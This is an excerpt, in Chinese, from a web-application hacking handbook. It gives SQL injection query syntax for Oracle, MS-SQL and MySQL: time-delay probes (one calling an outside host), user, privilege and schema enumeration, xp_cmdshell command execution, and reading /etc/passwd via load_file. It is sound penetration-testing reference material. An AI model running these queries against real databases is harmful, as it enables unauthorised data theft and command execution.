摘自:《The Web Application Hacker's Handbook》

中文名:《黑客攻防技术宝典 Web实战篇》(第二版)




Oracle / MS-SQL / MySQL
(原文为三列表格,此处已被拉平。下文每个小标题之下,各条写法均按 Oracle、MS-SQL、MySQL 的顺序列出;同一数据库有多种写法时连续列出。)
ASCII 与 SUBSTRING(盲注逐字符取值时使用;注意 Oracle 的函数名是 SUBSTR,而非 SUBSTRING)

ASCII('A') 

SUBSTR('ABCDE',2,3)

ASCII('A') 

SUBSTRING('ABCDE',2,3)

ASCII('A') 

SUBSTRING('ABCDE',2,3)

获取当前数据库用户

Select Sys.login_user from dual

SELECT user FROM dual

SELECT SYS_CONTEXT('USERENV','SESSION_USER') FROM dual

select suser_sname()
SELECT user()
引起时间延迟

UTL_HTTP.request('http://xx.com')  -- 并非真正的"延时函数":它依赖数据库主机向一个不存在/不可达的主机发起 HTTP 请求并等待超时,延迟长短由网络超时决定,并且会产生对外的 DNS/HTTP 流量(可能被出站过滤拦截或留下日志)

waitfor delay '0:0:10'
(另一种写法:exec master..xp_cmdshell 'ping localhost' — 这是两条相互独立的语句,不应连写;xp_cmdshell 自 SQL Server 2005 起默认禁用,启用和执行都需要 sysadmin 权限)
sleep(100)  -- 参数单位为秒;实际探测时应使用较短的延时(如 5–10 秒),以免请求被前端或代理超时中断而无法区分
获取数据库版本
select banner from v$version
select @@version
select @@version
获取当前数据库
SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual

select db_name()

获取服务器名(MS-SQL):

select @@servername

SELECT database()  (MySQL)
获取当前用户权限
SELECT privilege FROM session_privs
SELECT grantee,table_name,privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES
SELECT * FROM information_schema.user_privileges WHERE grantee='[user]' 此处[user]由 SELECT user() 的输出决定。注意:该视图中 grantee 的格式为带单引号的 'user'@'host'(例如 'root'@'localhost'),而 user() 返回的是 root@localhost,需按此格式改写;另外 user() 返回的是连接时声明的账户,真正决定权限的是 current_user(),两者可能不同。
显示所有表和列

SELECT table_name||':'||column_name FROM all_tab_columns  -- 原文中的分隔符在排版时被打成了换行,此处用 ':' 代替,任意分隔符均可

SELECT table_name+':'+column_name FROM information_schema.columns  -- MS-SQL 用 + 做字符串拼接;原文的 "+'…',column_name" 是排版错误,会变成两列而非一列

SELECT CONCAT(table_name,':',column_name) FROM information_schema.columns  -- MySQL 没有 + 字符串拼接,必须用 CONCAT();原文的 "CONCAT+'…'" 是排版错误,无法执行
显示用户对象
Select object_name,object_type from user_objects
SELECT name FROM sysobjects
SELECT table_name FROM information_schema.tables(或trigger_name from information_schema.triggers等)
显示用户表
Select object_name,object_type from user_objects WHERE object_type='TABLE'或者显示用户访问的所有表:SELECT table_name FROM all_tables
SELECT name FROM sysobjects WHERE xtype='U'
SELECT table_name FROM information_schema.tables where table_type='BASE TABLE' and table_schema!='mysql'  -- 这里只排除了 mysql 库,information_schema、performance_schema 等系统库仍会被列出,可一并排除以缩小结果
显示表foo的列名
SELECT column_name FROM user_tab_columns WHERE table_name='FOO'  -- 原文的 "Name" 列在 user_tab_columns 中并不存在;另外 Oracle 会把未加引号的标识符转成大写存储,因此表名通常要写成 'FOO'。如果目标数据不为当前应用程序用户所有,改用 ALL_TAB_COLUMNS(可再加 owner 条件)
SELECT column_name FROM information_schema.columns WHERE table_name='foo'
SELECT column_name FROM information_schema.columns WHERE table_name='foo'
与操作系统交互(最简单的方式)
请参考David Litchfield所著的The Oracle Hacker's Handbook一书
exec master..xp_cmdshell 'dir c:\'  -- 原文 "xp_cmshell" 为笔误;该扩展存储过程默认禁用,需要 sysadmin 权限才能启用和调用
select load_file('/etc/passwd')  -- 需要当前账户具有 FILE 权限,且文件路径不受 secure_file_priv 限制并对 mysqld 进程可读;任一条件不满足时不会报错,而是直接返回 NULL